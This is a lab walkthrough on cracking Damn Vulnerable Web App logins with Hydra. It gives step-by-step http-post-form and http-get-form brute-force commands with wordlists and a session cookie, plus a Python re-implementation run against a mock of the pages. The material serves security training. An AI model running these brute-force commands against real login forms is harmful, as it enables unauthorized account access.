
Damn Vulnerable Web App Password Cracking with Hydra

Introduction:

In the realm of cybersecurity, understanding vulnerabilities is crucial for fortifying digital systems against potential threats. One such avenue is password security, where inadequate measures can lead to unauthorized access. The Damn Vulnerable Web App (DVWA) serves as a practical platform for exploring these vulnerabilities in a controlled environment. In this project, we delve into password cracking using Hydra, a powerful tool bundled with Kali Linux.


Part 1

1. Hydra comes pre-installed on Kali Linux. Typing hydra on its own in the terminal prints the help section, which lists every supported module (service) and option.


2. The exact syntax changes from site to site, because every login form has its own field names and failure message. Start with the target and the module. DVWA's login page submits its form with a POST request, so the module is http-post-form, and the first part of the quoted argument is the path to the login page:
hydra 10.0.1.66 http-post-form "/dvwa/login.php"


3. Next we need the name of the username field for the second part of the argument. In DVWA's login form it is username. Appending :username=^USER^ tells Hydra to substitute each username from its list wherever ^USER^ appears (note there is no space between the path and the colon):
hydra 10.0.1.66 http-post-form "/dvwa/login.php:username=^USER^"


4. The password field is named password, so we add it the same way. Every password in our list is substituted where ^PASS^ appears:
hydra 10.0.1.66 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^"

5. We also need to simulate pressing the login button, which the browser sends as the form field Login, and then tell Hydra how to recognise a failed attempt. The third part of the argument is the text DVWA prints when a login fails. Hydra matches this string case-sensitively, so copy it exactly from a failed login in the browser rather than from memory:
hydra 10.0.1.66 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login Failed"

6. The failure string goes at the very end of the quoted argument so that Hydra can tell a wrong password from a correct one: any response that does not contain it is reported as a hit. The wordlists are given outside the quotes:
hydra 10.0.1.66 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login Failed" -L username.txt -P password.txt
7.    -L names the file containing the list of usernames (use -l for a single username).
8.    -P names the file containing the list of passwords (use -p for a single password).
9.    Create the username list with nano username.txt, one username per line.
10.   Create the password list with nano password.txt, one password per line.
11.   Run the command:
hydra 10.0.1.66 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=submit:Login Failed" -L username.txt -P password.txt

Part 2

1. We are going to use Hydra to attack the Brute Force section of the DVWA website.

Here the username and password are sent in the URL query string with a GET request (they are visible in the address bar after the form is submitted), so we have to use the http-get-form module instead.

2. The command starts the same way, with the target and the module: hydra 10.0.1.66 http-get-form ""


3. Inside the quotes we first specify the path to the page.


4. hydra 10.0.1.66 http-get-form "/dvwa/vulnerabilities/brute/:"


5. The second part, separated by a colon, is the form data, where we specify the username and password fields. We must also look at the page source (or at the URL after a failed attempt) to get the exact field names, the name and value of the submit button, and the error text the page prints when the login fails.


6. Run hydra 10.0.1.66 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." -L username.txt -P password.txt


7. Sometimes the command will not work as written and more arguments are needed. The brute-force page is only served to a logged-in session, so Hydra must send the browser's cookies (the DVWA security level and the PHPSESSID session id) with every request. Without a valid session cookie DVWA sends each request back to the login page, the failure string is never seen, and Hydra reports every username/password pair as valid.


8. First attempt, which did not work: hydra 10.0.1.66 http-get-form "dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H-Cookie: security=low; PHPSESSID=52e83e1ae2ad5e7aa2a10a93cb3c9676" -L username.txt -P password.txt

9. The syntax above no longer works and has to be modified: the extra header is introduced with H= (not H-) and is placed before the failure string. Take the PHPSESSID value from your own browser session, since it changes every time you log in:
hydra 10.0.1.66 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=2e65d4564c782005bb15e684783e3c99:Username and/or password incorrect." -L usernames.txt -P passwords.txt


10. The general form, with the target address and the session id as placeholders: hydra [TARGET_ADDR] http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=low; PHPSESSID=SESSION_ID:Username and/or password incorrect." -L usernames.txt -P passwords.txt


11. We then see that only one username/password pair worked.
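The following is an added example, not code from the original page or from the Hydra project: a small Python re-implementation of what Hydra's http-post-form and http-get-form modules do in Part 1 and Part 2 (substitute ^USER^ and ^PASS^ into the form template, send the request with any extra header, and treat a response that lacks the failure string as a hit), run against an in-process mock of the two DVWA pages so it can be studied offline. The valid account admin/password, the session id value, the wordlists and the mock's responses are all constructed for the example; the failure strings are the ones quoted in the walkthrough. Hydra's real parsing of the quoted argument is not reproduced; the path, template, failure string and header are passed as separate parameters instead.

```python
import itertools
from urllib.parse import parse_qs

# Constructed stand-ins for the lab: the one account the mock accepts and a fake
# session id in place of the real PHPSESSID (both assumptions, not from the page).
VALID_CREDS = {"admin": "password"}
SESSION_ID = "deadbeef"


def mock_dvwa(method, path, query, body, headers):
    """In-process stand-in for the two DVWA pages used in the walkthrough.

    Returns (status, response_body). Only the behaviour the attack depends on is
    modelled: login.php answers a POST, the brute-force page answers a GET but
    only for a request that carries a valid session cookie.
    """
    cookies = headers.get("Cookie", "")
    if method == "POST" and path == "/dvwa/login.php":
        form = parse_qs(body)
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDS.get(user) == password:
            return 302, ""  # DVWA redirects to index.php on success
        return 200, "<pre><br />Login Failed</pre>"
    if method == "GET" and path == "/dvwa/vulnerabilities/brute/":
        if f"PHPSESSID={SESSION_ID}" not in cookies:
            return 302, ""  # no session: bounced to login.php, the form is never reached
        form = parse_qs(query)
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDS.get(user) == password:
            return 200, "<p>Welcome to the password protected area admin</p>"
        return 200, "<pre><br />Username and/or password incorrect.</pre>"
    return 404, ""


def form_attack(path, template, fail_string, users, passwords,
                method="POST", headers=None):
    """What the http-post-form / http-get-form modules do for each pair:
    substitute ^USER^ and ^PASS^ into the form template, send the request with
    any extra headers (Hydra's H=...), and report a hit whenever the response
    does NOT contain the failure string. Returns the list of (user, password) hits."""
    headers = headers or {}
    hits = []
    for user, password in itertools.product(users, passwords):
        params = template.replace("^USER^", user).replace("^PASS^", password)
        if method == "POST":
            _, page = mock_dvwa("POST", path, "", params, headers)  # params in the body
        else:
            _, page = mock_dvwa("GET", path, params, "", headers)  # params in the query
        if fail_string not in page:
            hits.append((user, password))
    return hits


# Constructed wordlists standing in for username.txt / password.txt.
USERS = ["admin", "gordonb", "pablo"]
PASSWORDS = ["123456", "letmein", "password"]
FORM = "username=^USER^&password=^PASS^&Login=Login"
BRUTE_FAIL = "Username and/or password incorrect."

if __name__ == "__main__":
    # Part 1: POST to login.php, failure string "Login Failed"
    print("login.php:", form_attack("/dvwa/login.php", FORM, "Login Failed",
                                    USERS, PASSWORDS))
    # Part 2 as in step 7: no cookie, so every attempt is a redirect with no
    # failure text in it and every pair is reported as valid (false positives)
    print("brute/ without cookie:",
          form_attack("/dvwa/vulnerabilities/brute/", FORM, BRUTE_FAIL,
                      USERS, PASSWORDS, method="GET"))
    # Part 2 as in step 9: the Cookie header carries the security level and session
    print("brute/ with cookie:",
          form_attack("/dvwa/vulnerabilities/brute/", FORM, BRUTE_FAIL,
                      USERS, PASSWORDS, method="GET",
                      headers={"Cookie": f"security=low; PHPSESSID={SESSION_ID}"}))
```

The middle run is the symptom behind step 7: when the session cookie is missing, nothing in the response matches the failure string, so every pair comes back as a hit. Seeing Hydra report all of your wordlist as valid is the cue to check the cookie header rather than to trust the result.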

 Lessons Learned

  1. Hydra Utility: Hydra, an integral part of the Kali Linux distribution, is a versatile tool for performing password attacks. Its capabilities extend to various protocols and authentication mechanisms, making it a valuable asset in penetration testing.

  2. Help Section Exploration: Before diving into action, it's essential to familiarize oneself with the tool's functionalities. Typing 'hydra' reveals a comprehensive help section, providing insights into the available options and syntax.

  3. Understanding Syntax: The syntax for Hydra commands can vary depending on the target website's structure. This necessitates careful examination and adaptation of the command parameters to suit the specific scenario.

  4. HTTP Form-Post Attack: Cracking passwords through HTTP form-post requests involves crafting Hydra commands tailored to mimic user login attempts. Key elements include specifying the target IP, login page, username, password, and the login button submission.

  5. Differentiating Responses: Distinguishing between successful and failed login attempts is crucial. Hydra facilitates this by allowing users to define strings indicative of login success or failure, enabling efficient password enumeration.

  6. List Specification: Hydra enables the use of external lists for usernames and passwords, enhancing the scalability and effectiveness of brute-force attacks. Proper management of these lists is essential for maximizing success rates.

  7. HTTP Get-Form Attack: In scenarios where login credentials are transmitted via HTTP GET requests, Hydra's http-get-form module becomes instrumental. Similar principles apply, but adjustments are made to accommodate the distinctive request format.

  8. Handling Additional Parameters: Some scenarios may require additional parameters to ensure successful authentication. Understanding how to incorporate these parameters into Hydra commands is essential for overcoming such challenges.

  9. Source File Examination: Analyzing the source code of web pages can provide valuable insights into the structure of HTTP requests, aiding in the formulation of effective Hydra commands.

  10. Security Considerations: Adhering to ethical standards and legal obligations is paramount when conducting security assessments. Usage of tools like Hydra should be confined to authorized testing environments to prevent misuse and potential legal repercussions.

© 2023 by Legend Glenn.
